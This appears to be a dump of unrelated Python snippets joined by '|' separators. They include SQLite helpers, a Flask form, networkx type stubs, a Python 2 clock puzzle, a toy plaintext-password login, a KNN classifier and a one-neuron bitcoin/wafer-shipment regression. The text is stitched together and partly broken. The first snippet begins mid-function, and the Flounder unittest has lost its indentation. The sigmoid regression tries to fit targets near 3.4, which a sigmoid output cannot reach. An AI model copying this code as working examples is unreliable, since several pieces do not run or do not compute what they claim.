        conn.commit()
    finally:
        # FIX: the original leaked the connection if the script failed.
        conn.close()
def insert_data(sql):
    """Execute a data-modifying SQL statement and commit it.

    Returns the cursor on success, or None if execution failed (the
    failure is logged, mirroring the original best-effort behavior).
    WARNING: `sql` is executed verbatim — never build it from untrusted
    input; use parameterized queries upstream.
    """
    conn = sqlite3.connect(db_path)
    try:
        cursor = conn.cursor()
        response = cursor.execute(sql)
        cursor.close()
        conn.commit()
        return response
    except Exception as e:
        logging.warning('Exception:%s' % e)
    finally:
        conn.close()
def select_data(sql):
    """Run a SELECT statement and return all fetched rows (None on error)."""
    conn = sqlite3.connect(db_path)
    try:
        cursor = conn.cursor()
        cursor.execute(sql)
        rows = cursor.fetchall()
        cursor.close()
        return rows
    except Exception as e:
        logging.warning('Exception:%s' % e)
    finally:
        # Always release the connection, success or failure.
        conn.close()
if __name__ == '__main__':
    # Script entry point: build the schema.
    """创建表"""
    create_table()
|
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField
from wtforms.validators import DataRequired
class SearchBar(FlaskForm):
    """Simple search form: one required text field plus a submit button."""
    # Search terms; DataRequired rejects empty submissions.
    query = StringField('', validators=[DataRequired()])
    search_btn = SubmitField('Search')
|
import dash_bootstrap_components as dbc
from dash import html
# Demo layout: two loading-placeholder bars — a half-width bar and a
# third-width button-shaped one — separated by a line break.
placeholder = html.Div(
    [
        dbc.Placeholder(xs=6),
        html.Br(),
        dbc.Placeholder(xs=4, button=True),
    ]
)
|
from collections.abc import (
Callable,
Collection,
Hashable,
Iterable,
Iterator,
Mapping,
MutableMapping,
)
from typing import ClassVar, Generic, TypeVar, overload
from _typeshed import Self, Incomplete
from networkx.classes.coreviews import AdjacencyView
from networkx.classes.digraph import DiGraph
from networkx.classes.reportviews import DiDegreeView, NodeView, OutEdgeView
from networkx.convert import _Data
from typing_extensions import TypeAlias
# Shared aliases for the graph stubs below.
_Node = TypeVar("_Node", bound=Hashable)  # node type; nodes must be hashable
Edge: TypeAlias = tuple[_Node, _Node]  # a (u, v) node pair
EdgePlus: TypeAlias = Edge[_Node] | tuple[_Node, _Node, dict[str, Incomplete]]  # edge, optionally with an attribute dict
MapFactory: TypeAlias = Callable[[], MutableMapping[str, Incomplete]]  # factory producing attribute mappings
NBunch: TypeAlias = None | _Node | Iterable[_Node]  # one node, an iterable of nodes, or None (= all nodes)
class Graph(Collection[_Node], Generic[_Node]):
    """Type stub for networkx's undirected Graph.

    NOTE(review): `edges` is typed OutEdgeView and `degree` DiDegreeView
    (the directed-view types) — verify against the stubs' intent before
    tightening.
    """
    # Factories networkx uses to build its internal nested dict-of-dicts.
    node_dict_factory: ClassVar[MapFactory] = ...
    node_attr_dict_factory: ClassVar[MapFactory] = ...
    adjlist_outer_dict_factory: ClassVar[MapFactory] = ...
    adjlist_inner_dict_factory: ClassVar[MapFactory] = ...
    edge_attr_dict_factory: ClassVar[MapFactory] = ...
    graph_attr_dict_factory: ClassVar[MapFactory] = ...
    def to_directed_class(self) -> type[DiGraph[_Node]]: ...
    def to_undirected_class(self) -> type[Graph[_Node]]: ...
    def __init__(
        self, incoming_graph_data: _Data[_Node] | None = None, **attr: Incomplete
    ) -> None: ...
    # Read-only adjacency view: node -> neighbor -> edge-attribute dict.
    adj: AdjacencyView[_Node, _Node, dict[str, Incomplete]]
    name: str
    def __getitem__(self, n: _Node) -> MutableMapping[Hashable, Incomplete]: ...
    def __iter__(self) -> Iterator[_Node]: ...
    def __contains__(self, n: object) -> bool: ...
    def __len__(self) -> int: ...
    def add_node(self, node_for_adding: _Node, **attr: Incomplete) -> None: ...
    def add_nodes_from(
        self,
        nodes_for_adding: Iterable[_Node | tuple[_Node, dict[str, Incomplete]]],
        **attr: Incomplete
    ) -> None: ...
    def remove_node(self, n: _Node) -> None: ...
    def remove_nodes_from(self, nodes: Iterable[_Node]) -> None: ...
    nodes: NodeView[_Node]
    def number_of_nodes(self) -> int: ...
    def order(self) -> int: ...
    def has_node(self, n: _Node) -> bool: ...
    def add_edge(
        self, u_of_edge: _Node, v_of_edge: _Node, **attr: Incomplete
    ) -> None: ...
    def add_edges_from(
        self, ebunch_to_add: Iterable[EdgePlus[_Node]], **attr: Incomplete
    ) -> None: ...
    def add_weighted_edges_from(
        self,
        ebunch_to_add: Iterable[tuple[_Node, _Node, Incomplete]],
        weight: str = ...,
        **attr: Incomplete
    ) -> None: ...
    def remove_edge(self, u: _Node, v: _Node) -> None: ...
    def remove_edges_from(self, ebunch: Iterable[EdgePlus[_Node]]) -> None: ...
    # update() accepts either another graph, or (edges, nodes) iterables.
    @overload
    def update(self, edges: Graph[_Node], nodes: None = None) -> None: ...
    @overload
    def update(
        self,
        edges: Graph[_Node] | Iterable[EdgePlus[_Node]] | None = ...,
        nodes: Iterable[_Node] | None = ...,
    ) -> None: ...
    def has_edge(self, u: _Node, v: _Node) -> bool: ...
    def neighbors(self, n: _Node) -> Iterable[_Node]: ...
    edges: OutEdgeView[_Node]
    def get_edge_data(
        self, u: _Node, v: _Node, default: Incomplete = ...
    ) -> Mapping[str, Incomplete]: ...
    def adjacency(
        self,
    ) -> Iterable[tuple[_Node, Mapping[_Node, Mapping[str, Incomplete]]]]: ...
    degree: DiDegreeView[_Node]
    def clear(self) -> None: ...
    def clear_edges(self) -> None: ...
    def is_multigraph(self) -> bool: ...
    def is_directed(self) -> bool: ...
    def copy(self: Self, as_view: bool = ...) -> Self: ...
    def to_directed(self, as_view: bool = ...) -> DiGraph[_Node]: ...
    def to_undirected(self, as_view: bool = ...) -> Graph[_Node]: ...
    def subgraph(self, nodes: Iterable[_Node]) -> Graph[_Node]: ...
    def edge_subgraph(self, edges: Iterable[Edge[_Node]]) -> Graph[_Node]: ...
    # size() returns an int edge count, or a float sum when weighted.
    @overload
    def size(self, weight: None = ...) -> int: ...
    @overload
    def size(self, weight: str) -> float: ...
    def number_of_edges(self, u: _Node | None = ..., v: _Node | None = ...) -> int: ...
    def nbunch_iter(self, nbunch: NBunch[_Node] = ...) -> Iterable[_Node]: ...
|
#!/usr/bin/env python
# Each entry: (switch number, clocks advanced when that switch is pressed).
# NOTE: Python 2 script (raw_input, print statements, integer '/') — kept as-is.
switches = [
    (0, (0, 1, 2)),
    (1, (0, 2, 14, 15)),
    (2, (3, 7, 9, 11)),
    (3, (3, 14, 15)),
    (4, (4, 10, 14, 15)),
    (5, (4, 5, 7, 14, 15)),
    (6, (0, 4, 5, 6, 7)),
    (7, (1, 2, 3, 4, 5)),
    (8, (6, 7, 8, 10, 12)),
    (9, (3, 4, 5, 9, 13))
]
""" sort switch by maxClock """
switches = [ (switchNo, clockNoList) for switchNo, clockNoList in sorted(switches, key=lambda switchInfo : len(switchInfo[1]), reverse=True) ]
sampleMaxCount = int(raw_input())
for sampleNo in range(sampleMaxCount):
    #inStr = "12 9 3 12 6 6 9 3 12 9 12 9 12 12 6 6"
    inStr = raw_input()
    # Clock faces 3/6/9/12 become states 0..3 (Python 2 integer division).
    clockStates = [ int(term)/4 for term in inStr.strip().split() ]
    switchList = []
    while True:
        """ check complete? """
        # Done when all 16 clocks sit at state 3 (i.e. 12 o'clock).
        if sum(clockStates) == (3*16):
            break
        """ clock eval """
        # Greedy: press the switch whose clocks have the lowest mean state.
        for swichNo, clockNoList in sorted( switches, key=lambda switchInfo : (sum([ clockStates[clockNo] for clockNo in switchInfo[1]])/float(len(switchInfo[1]))) ):
            """ switch click!!! """
            for clockNo in clockNoList:
                clockStates[clockNo] += 1
                if clockStates[clockNo] == 4:
                    clockStates[clockNo] = 0
            #print '*' * 60
            #print clockStates, swichNo, sum(clockStates)
            switchList.append( swichNo )
            break
    print len(switchList)
|
# Hard-coded demo credentials.
# NOTE(review): storing and comparing plaintext passwords is insecure —
# acceptable only as a toy exercise.
name = "zhang"
password = "123456"

username = input("your name:")
pw = input("your password:")

if name == username and password == pw:
    # BUG FIX: the original printed the misspelled "welcom login".
    print("welcome login")
else:
    print("username or password is wrong")
import unittest
import sys
import os
try:
from flounder.flounder import Flounder
except ImportError:
sys.path.append(
os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir))
from flounder.flounder import Flounder
DEVELOPER_ACCESS_TOKEN = 'YOUR_DEVELOPER_ACCESS_TOKEN'
class TestFlounder(unittest.TestCase):
    """Smoke tests for the Flounder API client."""

    def setUp(self):
        # Fresh client per test, authenticated with the developer token.
        self.flounder = Flounder(DEVELOPER_ACCESS_TOKEN)
        return

    def test_create(self):
        # Issue a create request for a 'Sushi' dataset backed by sushi.csv
        # and dump the raw HTTP response for manual inspection (no asserts).
        create_request = self.flounder.create_request('Sushi', 'sushi.csv')
        response = create_request.getresponse()
        print (response.read())
        print (response.status, response.reason)
        return
if __name__ == '__main__':
unittest.main() |
def find_character(li, l):
    """Return the items of li that contain the substring l, in order."""
    return [item for item in li if item.find(l) != -1]
# Python 2 print statement (kept as-is): prints True iff the filter returns
# exactly the words containing "o".
print find_character(['hello','world','my','name','is','Anna'],"o")==["hello","world"]
|
import numpy as np
import pandas as pd
class KNN:
    """Minimal k-nearest-neighbours classifier (majority vote over the k
    training rows closest in squared Euclidean distance)."""

    def __init__(self, k=7):
        # k: number of neighbours consulted per prediction
        self.k = k

    def fit(self, X_train, Y_train):
        """Memorize the training data (lazy learner: no actual fitting)."""
        self.X_train = X_train
        self.Y_train = Y_train

    def predict(self, X_test):
        """Return the predicted class label for each row of X_test."""
        self.y_pred = np.array([])
        # FIX: hoisted out of the loop — the original re-reshaped and
        # reassigned self.Y_train on every iteration, mutating the stored
        # attribute as a side effect of predict().
        y_column = self.Y_train.reshape(self.Y_train.shape[0], 1)
        for x in X_test:
            # Squared Euclidean distance from x to every training row.
            dist = np.sum((x - self.X_train) ** 2, axis=1)
            dist = dist.reshape(dist.shape[0], 1)
            # Pair each distance with its label, then sort by distance.
            distances = np.concatenate((dist, y_column), axis=1)
            distances = distances[distances[:, 0].argsort()]
            neighbours = distances[0:self.k]
            # Majority vote among the k nearest labels.
            classes, counts = np.unique(neighbours[:, 1], return_counts=True)
            self.y_pred = np.append(self.y_pred, classes[np.argmax(counts)])
        return self.y_pred

    def score(self, y_test, y_pred):
        """Accuracy of y_pred against y_test, as a percentage."""
        wrong_cnt = 0
        right_cnt = 0
        for i in range(len(y_test)):
            if (y_test[i] == y_pred[i]):
                right_cnt += 1
            else:
                wrong_cnt += 1
        return (right_cnt / (right_cnt + wrong_cnt) * 100)
from matplotlib import pyplot as plt
import numpy as np
# Original (unlogged) data, kept for reference. Format per row:
# [bitcoin price, video game sales, wafer shipments]
# Units: dollars (bitcoin), millions of dollars (game sales),
# millions of square inches / MSI (wafer shipments)
'''
data = [[415.16, 253, 2537.66], [672.48, 181.5,2705.605],
[608.44, 234.3,2730],[968.23, 997,2764.293],
[1079.75, 485, 2858], [2504.28, 231, 2978],
[4764.87, 168, 2978],[4349.29, 316, 2997],
[13860.14, 1270, 2977]]
'''
# Base-10 log of the data above: [log(price), log(sales), log(shipments)]
data = [[2.62, 2.40, 3.40], [2.83, 2.26, 3.43],
[2.78, 2.37, 3.44],[2.99, 3.00, 3.44],
[3.03, 2.69, 3.46], [3.40, 2.36, 3.47],
[3.68, 2.23, 3.47],[3.63, 2.5, 3.47],
[4.14, 3.1, 3.48]]
# Query point: log10(8441.24) ~ 3.93 dollars, log10(500) ~ 2.70 sales
today = [3.93, 2.70]
#Activation function
def activation_function(data_point, w1, w2, b):
    """Linear neuron: weighted sum of the two features plus bias."""
    weighted = data_point[0] * w1
    weighted += data_point[1] * w2
    return weighted + b
#Sigmoid Function
def sigmoid(x):
    """Logistic function mapping any real x into (0, 1)."""
    return 1.0 / (np.exp(-x) + 1)
#Derivative of Sigmoid Function
def derivative_sigmoid(x):
    # s'(z) = s(z) * (1 - s(z)): this expects x to already be a sigmoid
    # OUTPUT — passing a raw pre-activation yields a wrong gradient.
    return x * (1 - x)
#Training
def train(desired_prediction):
    """Fit w1, w2, b by stochastic gradient descent on the module-level
    `data`, then print cost history, the learned parameters, and the
    prediction 10**(w1*x1 + w2*x2 + b) for `desired_prediction`
    (a [log_bitcoin_price, log_game_sales] pair)."""
    # Random initialization of weights and bias
    w1 = np.random.randn()
    w2 = np.random.randn()
    b = np.random.randn()
    # Training hyperparameters
    iterations = 550000
    learning_rate = 0.00005
    # Total dataset cost, sampled every 100 iterations for inspection
    costs = []
    for i in range(iterations):
        # Pick one random training example (stochastic gradient descent)
        ri = np.random.randint(len(data))
        point = data[ri]
        # Forward pass: linear combination then sigmoid
        z = point[0] * w1 + point[1] * w2 + b
        pred = sigmoid(z)
        # The target is the 3rd element (log wafer shipments)
        target = point[2]
        # Track the total cost across all data points every 100 iterations
        # (the original also computed an unused per-sample cost here; removed)
        if i % 100 == 0:
            c = 0
            for j in range(len(data)):
                p = data[j]
                p_pred = sigmoid(w1 * p[0] + w2 * p[1] + b)
                c += np.square(p_pred - p[2])
            costs.append(c)
        # Backpropagation (chain rule through cost -> pred -> z -> params)
        dcost_dpred = 2 * (pred - target)
        # BUG FIX: derivative_sigmoid computes s*(1-s) and therefore expects
        # the sigmoid OUTPUT; the original passed the raw pre-activation z.
        dpred_dz = derivative_sigmoid(pred)
        dz_dw1 = point[0]
        dz_dw2 = point[1]
        dz_db = 1
        dcost_dz = dcost_dpred * dpred_dz
        dcost_dw1 = dcost_dz * dz_dw1
        dcost_dw2 = dcost_dz * dz_dw2
        dcost_db = dcost_dz * dz_db
        # Gradient-descent parameter update
        w1 = w1 - learning_rate * dcost_dw1
        w2 = w2 - learning_rate * dcost_dw2
        b = b - learning_rate * dcost_db
    print()
    print('Costs, weights, and bias')
    print(costs)
    print(w1)
    print(w2)
    print(b)
    print()
    print('Prediction')
    print(10**activation_function(desired_prediction, w1, w2, b))
#Train and plot the prediction for today's [log_price, log_sales] pair
train(today)
def closest_mod_5(x):
    """Return the smallest integer >= x that is divisible by 5.

    The original counted upward one step at a time; the modular expression
    below gives the identical result for integers in O(1).
    """
    return x + (-x % 5)
# Demo: the closest multiple of 5 at or above 31 is 35.
x = 31
a = closest_mod_5(x)
print(a)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.